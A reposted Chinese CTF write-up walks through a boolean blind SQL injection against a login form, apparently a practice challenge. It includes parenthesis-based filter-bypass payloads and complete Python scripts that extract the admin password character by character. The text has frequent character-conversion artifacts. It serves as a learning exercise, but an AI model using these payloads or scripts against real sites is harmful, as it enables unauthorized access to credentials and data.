一些師兄給了個(gè)平臺(tái)，最近學(xué)了很多SQL注入和編寫(xiě)腳本的知識(shí)，躍躍欲試，結(jié)果這一做就是漫漫長(zhǎng)路，還是很多東西不熟悉啊。

首先找注入點(diǎn)：

發(fā)現(xiàn)用戶名錯(cuò)誤和密碼錯(cuò)誤會(huì)分開(kāi)提示，可以用布爾盲注，(*^▽^*)好高興。

但是發(fā)現(xiàn)，過(guò)濾了?空格和 *號(hào)，沒(méi)關(guān)系，用括號(hào)繞過(guò)(這一下搞死我了)

開(kāi)始嘗試編寫(xiě)腳本，結(jié)果發(fā)現(xiàn)簡(jiǎn)單的reuqests解析不了

標(biāo)簽下的內(nèi)容

沒(méi)辦法? ?又去學(xué)習(xí)一下“美麗的湯”?Beautifulsoup 解析網(wǎng)頁(yè)

首先放上一段測(cè)試代碼：

# -*- coding:utf-8 -*-

from bs4 import BeautifulSoup

import requests

session = requests.Session()

paramsPost = {"password":"1","username":"admin"}

headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":"http://152.136.63.75:8002/","Connection":"close","Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3","DNT":"1","Content-Type":"application/x-www-form-urlencoded"}

cookies = {"PHPSESSID":"f1jb3rhc5ebhv1gf7q943bb413"}

res = session.post("http://152.136.63.75:8002/", data=paramsPost, headers=headers, cookies=cookies)

res.encoding = 'utf-8'

print("Status code: %i" % res.status_code)

#print("Response body: %s" % response.content)

soup = BeautifulSoup(res.text,'html.parser')

result = soup.find_all(text = '密碼錯(cuò)誤')

print(result)

print(type(result))

Output：

這里可以使用Burp?suite?一個(gè)插件??Reissue Request Scripter? ?快速生成reuqests頭部?加快寫(xiě)腳本時(shí)間

之后就是構(gòu)造語(yǔ)句的環(huán)節(jié)了，可以在本地上用SQL查看器中去檢查自己的命令是否正確，因?yàn)槔ㄌ?hào)真的很多，需要不斷去嘗試

這里也總結(jié)了一些教訓(xùn)，可以先用一個(gè)記事本，把payload一個(gè)一個(gè)記下來(lái)，把查詢(xún)的語(yǔ)句和判斷語(yǔ)句分開(kāi)：

#最后拼接的主體部分

admin'^1^(ascii()={})

#substr來(lái)確認(rèn)數(shù)據(jù)

substr(( ),{},1)

#查詢(xún)語(yǔ)句

select(group_concat(table_name))from(information_schema.tables)where(table_schema)=(database())

#最后每更換一次查詢(xún)語(yǔ)句再將全部組合起來(lái)(這個(gè)查列名的語(yǔ)句錯(cuò)到我懷疑人生)

admin'^1^if((select(length(group_concat(column_name))=%d)from(information_schema.columns)where(table_schema)=(database())and(table_name)='admin'),1,0)#

在這里要主要爆長(zhǎng)度的判斷：(這里也是一個(gè)易錯(cuò)點(diǎn))

#一定要將select (length() = '')

select * from users where id =1^if((select(length(group_concat(table_name))

= ' ')from(information_schema.tables)where(table_schema)=(database())),1,0);

#錯(cuò)誤語(yǔ)句

select * from users where id =1^if((select(length(group_concat(table_name)))from(information_schema.tables)where(table_schema)=(database()) = ' '),1,0);

#無(wú)論數(shù)字如何最后查出來(lái)一定是NULL

判斷的位置不一樣，結(jié)果也不一樣，會(huì)影響最后結(jié)果

貼出腳本：

import requests

import string

str = string.ascii_lowercase+string.ascii_uppercase+string.digits+'-{}+='

from bs4 import BeautifulSoup

session = requests.Session()

paramsPost = {"password":1,"username":" "}

headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":"http://152.136.63.75:8002/","Connection":"close","Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3","DNT":"1","Content-Type":"application/x-www-form-urlencoded"}

cookies = {"PHPSESSID":"f1jb3rhc5ebhv1gf7q943bb413"}

def name():

flag = " "

for i in range(length()):

for str1 in str:

#paramsPost["username"] = "admin'^1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema)=(database())and(table_name)='admin'),{},1))={})#".format (i+1, ord(str1))

paramsPost["username"] = "admin'^1^(ascii(substr((select(password)from(admin)where(username)='admin'),{},1))={})#".format(i+1, ord(str1))

print(str1)

res = session.post ("http://152.136.63.75:8002/", data=paramsPost, headers=headers, cookies=cookies)

res.encoding = 'utf-8'

soup = BeautifulSoup (res.text, 'html.parser')

result = soup.find_all(text='密碼錯(cuò)誤')

#print(result)

if len(result) != 0:

flag +=str1

break

print(flag)

if(flag[-1] == '}'):

break

print(flag)

def length():

len1 = 0

for i in range(50):

#paramsPost['username'] = "admin'^1^if((select(length(group_concat(column_name))=%d)from(information_schema.columns)where(table_schema)=(database())and(table_name)='admin'),1,0)#" % i

paramsPost['username']="admin'^1^(select(length(password)=%d)from(admin)where(username)='admin')#" % i

res = session.post ("http://152.136.63.75:8002/", data=paramsPost, headers=headers, cookies=cookies)

res.encoding = 'utf-8'

soup = BeautifulSoup (res.text, 'html.parser')

result = soup.find_all(text='密碼錯(cuò)誤')

print(result)

if len(result) != 0:

len1 = i

break

print(len1)

return len1

name()

一步步報(bào)數(shù)據(jù)，爆出admin的密碼是一個(gè)MD5值，

最后發(fā)現(xiàn)這道題和Bugku的login3有基本一樣，但是從頭到尾自己做一遍，發(fā)現(xiàn)構(gòu)造語(yǔ)句還是有很多地方不足，SQL盲注這里還有很多練習(xí)的。

原文鏈接:https://blog.csdn.net/weixin_45887311/article/details/105739091

總結(jié)

以上是生活随笔為你收集整理的python sql注入漏洞 ctf_CTF-WEB 一个登录框SQL盲注的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。